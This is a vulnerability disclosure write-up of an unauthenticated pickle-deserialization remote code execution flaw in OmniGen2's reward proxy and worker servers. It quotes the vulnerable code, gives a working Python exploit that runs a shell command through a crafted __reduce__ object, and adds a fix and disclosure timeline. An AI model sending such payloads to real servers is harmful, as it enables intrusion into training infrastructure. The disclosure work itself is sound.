OmniGen2: Unauthenticated RCE via Pickle Deserialization in BAAI's Reward Server

Valentin Lobstein /
Table of Contents

Introduction

While doing a systematic audit of pickle deserialization patterns across popular ML/AI projects on GitHub, I found a critical vulnerability in OmniGen2, a multimodal AI project by BAAI (Beijing Academy of Artificial Intelligence) with 4,000+ stars.

The reward server component, used during reinforcement learning training, calls pickle.loads() directly on HTTP POST bodies without any form of authentication. This gives unauthenticated Remote Code Execution to anyone who can reach the server port - which binds to 0.0.0.0 by default.

Target: VectorSpaceLab/OmniGen2 Stars: 4,000+ CVE: CVE-2026-25873 Severity: Critical (CVSS 4.0: 9.3)

What is OmniGen2?

OmniGen2 is an open-source multimodal generation model developed by BAAI. It handles text-to-image generation, image editing, and visual understanding. The project includes an RL (Reinforcement Learning) training component called OmniGen2-RL, which uses a distributed reward server architecture to score generated outputs during training.

The reward server infrastructure consists of a proxy server (reward_proxy.py, port 23456) that distributes work to multiple backend workers (reward_server.py, ports 18888+). Both communicate via HTTP with pickle-serialized payloads.

The Vulnerability

The pattern is dead simple. In reward_proxy.py, line 208:

def prepare_request_data(request_body):
    data = pickle.loads(request_body)  # untrusted network input

This function is called from the Flask POST / endpoint at line 224:

@app.route("/", methods=["POST"])
def evaluate():
    ...
    data = prepare_request_data(request.data)

The same pattern exists in reward_server.py at line 118:

def parse_and_validate_request(raw_data):
    data = pickle.loads(raw_data)  # same thing

That’s it. Raw bytes from the network, straight into pickle.loads(). No authentication, no validation, no restricted unpickler. The server binds to 0.0.0.0 by default, making it accessible from any network interface.

Python’s pickle module executes arbitrary code during deserialization via the __reduce__ protocol - an attacker sends a crafted object, and pickle.loads() runs whatever function that object specifies before any other processing happens.

Proof of Concept

Setting Up the Target

I tested this against the real reward_proxy.py code from the repository, deployed in Docker exactly as the project documents it:

# Docker with real reward_proxy.py and real editscore_7B.yml config
docker run -d --name omnigen2-lab -p 23456:23456 omnigen2-lab

The server starts with:

python reward_proxy.py --config_path server_configs/editscore_7B.yml

The Exploit

import pickle
import os
import requests

class RCE:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

requests.post('http://target:23456/', data=pickle.dumps(RCE('id > /tmp/pwned')))

Result

$ docker exec omnigen2-lab cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)   # <-- root!

The server returns HTTP 400 - that’s expected. The pickle.loads() call executes the malicious payload, then the server tries to access dict keys on the result (which is an int from os.system()), fails, and returns an error. But the RCE already happened before the validation.

Both the proxy server (port 23456) and the worker servers (ports 18888+) are vulnerable through the same pattern.

Attack Surface

The deployment architecture makes this particularly concerning:

  • The proxy binds to 0.0.0.0:23456 by default
  • Worker servers bind to 0.0.0.0:18888 (and sequential ports)
  • The deployment scripts (start_multi_machines.sh) use SSH to start servers across multiple hosts, confirming these are meant to be network-accessible
  • No firewall rules, TLS, or authentication tokens are referenced anywhere in the codebase
  • These servers run on GPU nodes, so compromise gives access to expensive compute infrastructure

There’s also a client-side vector: reward_client_edit.py calls pickle.loads(response.content) on server responses, meaning a compromised server could RCE the training clients too.

Suggested Fix

The reward server serializes scores, image paths, and training configs - all representable as JSON. Replace pickle.loads() with json.loads() and add a shared secret in an Authorization header.

Timeline

  • 2026-02-10: Vulnerability discovered and confirmed via Docker PoC
  • 2026-02-10: Disclosure email sent to vendor (project leads via arxiv paper contacts)
  • 2026-02-10: CVE request submitted to VulnCheck
  • 2026-02-11: CVE-2026-25873 assigned by VulnCheck
  • 2026-03-18: No response from maintainers. Fix PR submitted: #139
  • 2026-03-18: CVE published, write-up disclosed

Takeaways

OmniGen2 is the most straightforward case in this series - HTTP POST body straight into pickle.loads(), running as root in Docker, on a multi-machine deployment with SSH-based orchestration. The client-side vector (deserializing server responses) adds a bidirectional risk: compromise the server, and you compromise every training client that connects to it.